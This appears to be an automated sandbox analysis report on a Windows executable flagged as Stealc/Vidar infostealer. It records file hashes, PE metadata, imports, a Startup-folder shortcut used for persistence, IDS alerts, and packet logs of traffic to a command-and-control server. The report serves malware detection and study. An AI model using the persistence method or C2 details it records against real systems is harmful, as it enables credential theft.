Download File

Process:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
File Type:	Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:/7rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrD:T
MD5:	C107183CD7C1C9CE5F8B6B7EF4EF8D39
SHA1:	414A2EB644F379D2A92EFF0AC5900AB9BADFE495
SHA-256:	C62B764F37F1FDAEB9818DD4801B99DC9AC8E6CAAB4B37D859577A97C217E027
SHA-512:	60D63AC08626BD9977C7DCCE7DBBD8E642AD4ED5621957318EEE976151CFECC8C74A8E4A5786F31C1FB5F750C6A7F5FD3551AEDACEC480BF2AB6320935C38CB7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.881232274983282
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoONtkE2J52Oc7LCjNe+l6pHq:HRYF5yjoCN232Oc7LCpcpHq
MD5:	210F8F27B3252781F4DD2530A7E0BCE0
SHA1:	4AF5162696FA9B2E87C5F892E1A9237B27C592FA
SHA-256:	6FE7AF49B26482C5159D6C62DDB927962886D3364796DC60AF450A25FFA26289
SHA-512:	8BDF9C781B7A5E576105697DAB9A1D6DE85910C0C5C008D03959889E10D020643110885D7D78698B83B6F25F05BD0AADD3C1C035B46F240170B0151C025E1109
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" ..

Chrome Cache Entry: 369

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3162)
Category:	downloaded
Size (bytes):	3167
Entropy (8bit):	5.85169996270273
Encrypted:	false
SSDEEP:	48:6i0coKlgJXwITIbx6666YuhxbCB0UzfJLPbjHQF3h4t1AtUwVEofBU9we/uSNYYi:17lgIN6666YK9CzzVHQScVN6AffQffo
MD5:	D89F7B78066D5A93644E17C4976DA637
SHA1:	0CB4A07EBCF0B69C869712D749FDF5517256FA71
SHA-256:	13412F036637B71296A8C348A799C9DB525A7C6502135AF4D4B4E86C2B6F37CC
SHA-512:	BA35DD49D5AB4C1B55D5C01027122161E45B303844C9D745817FAD5264DD8882E5DBC9541D7E216BEECFA956E1DC7FF7133557AD5BEA4E2DE991753BAFD159BE
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["monster hunter wilds beta","netflix the diplomat season 3","boeing strike contract offer","brazilian grand prix","hawaii mauna kea snowfall","wordle today november 1","freddie freeman world series mvps","walmart black friday sales"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wMzVod20SADLHDGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBQ1FBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUFCUVFHQndNQ0FmL0VBRFFRQUFFREF3TUJCZ01HQndBQUFBQUFBQUVDQXdRQUJSRUdFakVoRXlKQlVZR1JNbkd4QnpOQ1lhSHdGQlVYSklMQjBmL0VBQm9CQUFJRE

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.978780081697768
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	JHPvqMzKbz.exe
File size:	1'690'066 bytes
MD5:	0f4af03d2ba59b5c68066c95b41bfad8
SHA1:	ecbb98b5bde92b2679696715e49b2e35793f8f9f
SHA256:	c263ebdc90fdb0a75d6570f178156c0ba665ac9f846b8172d7835733e5c3de59
SHA512:	ea4de68e9eb4a9b69527a3924783b03b4b78bffc547c53a0ecd74d0bd0b315d312ae2f17313085acd317be1e0d6f9a63e0089a8a20bf9facc5157a9b8bea95a3
SSDEEP:	24576:Wa0E71YwbX4e2F4fOfq444sMDF6XR5w5ZVcs5I0wzvZBjQB/CtNJb/zUJH++QLS0:vYwD4e2FkCq/yYB5alxUNJLzyiegcIZ
TLSH:	4C75338892CF99B7F0E10FF418F50A524DB6B6B25164C93697506ECA3F29988DC3D70B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8.....

File Icon


Icon Hash:	2091c830912c160b

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F4A48893EEBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F4A48893BCDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F4A48893BBBh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F4A488914BAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F4A48893891h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F4A48891543h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F4A488914BAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x6ec6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x19aa92	0x1b40
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x6ec6	0x7000	e48b0eb1454dfb286d7484d4faf4aea2	False	0.5564313616071429	data	5.2710098846973965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfb000	0xf32	0x1000	f1b5dfaa64f313a8cd863943f8ae98f1	False	0.5908203125	data	5.431133010659424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4268	0x221e	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0001144950767118
RT_ICON	0xf6488	0xb86	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.003728813559322
RT_ICON	0xf7010	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.19029698942229456
RT_ICON	0xf9678	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.23793260473588343
RT_DIALOG	0xfa7a0	0x100	data	English	United States	0.5234375
RT_DIALOG	0xfa8a0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xfa9bc	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xfaa1c	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0xfaa5c	0x194	OpenPGP Secret Key	English	United States	0.5668316831683168
RT_MANIFEST	0xfabf0	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T20:53:03.221238+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.11.20	49770	188.245.203.37	443	TCP
2024-11-01T20:53:04.346658+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	188.245.203.37	443	192.168.11.20	49771	TCP
2024-11-01T20:53:05.477318+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	188.245.203.37	443	192.168.11.20	49772	TCP
2024-11-01T20:57:47.110955+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	188.245.203.37	443	192.168.11.20	49803	TCP
2024-11-01T20:57:48.252472+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	188.245.203.37	443	192.168.11.20	49804	TCP
2024-11-01T20:58:38.334084+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.11.20	58993	188.245.203.37	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 20:51:00.915266037 CET	49756	443	192.168.11.20	23.44.203.79
Nov 1, 2024 20:51:00.915302992 CET	49755	443	192.168.11.20	23.44.203.79
Nov 1, 2024 20:51:43.890275002 CET	49764	443	192.168.11.20	23.219.82.32
Nov 1, 2024 20:51:43.966476917 CET	49763	80	192.168.11.20	142.251.40.195
Nov 1, 2024 20:51:43.966593027 CET	49765	80	192.168.11.20	72.21.81.240
Nov 1, 2024 20:51:44.062665939 CET	80	49763	142.251.40.195	192.168.11.20
Nov 1, 2024 20:51:44.062860012 CET	49763	80	192.168.11.20	142.251.40.195
Nov 1, 2024 20:51:44.067231894 CET	80	49765	72.21.81.240	192.168.11.20
Nov 1, 2024 20:51:44.067481041 CET	49765	80	192.168.11.20	72.21.81.240
Nov 1, 2024 20:52:32.830925941 CET	49762	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:52:32.935178041 CET	443	49762	40.126.24.149	192.168.11.20
Nov 1, 2024 20:52:32.935520887 CET	49762	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:52:59.114629984 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.114650965 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.114800930 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.118015051 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.118025064 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.469680071 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.469862938 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.469862938 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.521078110 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.521162987 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.522190094 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.522411108 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.524167061 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.568025112 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.814815044 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.814829111 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.814865112 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.814872026 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.814984083 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.814984083 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.815048933 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.815100908 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.817189932 CET	49767	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:52:59.817202091 CET	443	49767	149.154.167.99	192.168.11.20
Nov 1, 2024 20:52:59.928675890 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:52:59.928752899 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:52:59.928953886 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:52:59.929240942 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:52:59.929280043 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.496226072 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.496437073 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.501583099 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.501599073 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.501948118 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.502110958 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.502486944 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.544032097 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.975145102 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.975209951 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.975291967 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.975415945 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.978024960 CET	49768	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.978043079 CET	443	49768	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.979806900 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.979830027 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:00.979975939 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.980135918 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:00.980146885 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:01.351808071 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:01.351965904 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:01.352312088 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:01.352327108 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:01.353720903 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:01.353735924 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.093625069 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.093693018 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.093781948 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.093832016 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.094053030 CET	49769	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.094074011 CET	443	49769	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.095091105 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.095160961 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.095345974 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.095545053 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.095561981 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.469465017 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.469728947 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.470053911 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.470068932 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:02.471429110 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:02.471445084 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.221256018 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.221266985 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.221306086 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.221473932 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.221720934 CET	49770	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.221735001 CET	443	49770	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.222800016 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.222820997 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.223119974 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.223164082 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.223175049 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.596832991 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.597033024 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.597651005 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.597698927 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:03.600380898 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:03.600425959 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346123934 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346210003 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346313953 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346375942 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346405029 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346411943 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346486092 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346580029 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346786976 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346786976 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.346836090 CET	443	49771	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.346982956 CET	49771	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.348001957 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.348087072 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.348248005 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.348455906 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.348498106 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.723365068 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.723568916 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.723869085 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.723915100 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:04.725214005 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:04.725266933 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:05.476948977 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:05.477092028 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.477097988 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:05.477255106 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.477317095 CET	49772	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.477374077 CET	443	49772	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:05.658444881 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.658520937 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:05.658709049 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.658776045 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:05.658806086 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.033286095 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.033696890 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.033987999 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.034018993 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.035450935 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.035450935 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.035500050 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.035526037 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.035542011 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.035557032 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.667583942 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.667614937 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.667794943 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.667951107 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.667967081 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.969983101 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:06.970151901 CET	443	49773	188.245.203.37	192.168.11.20
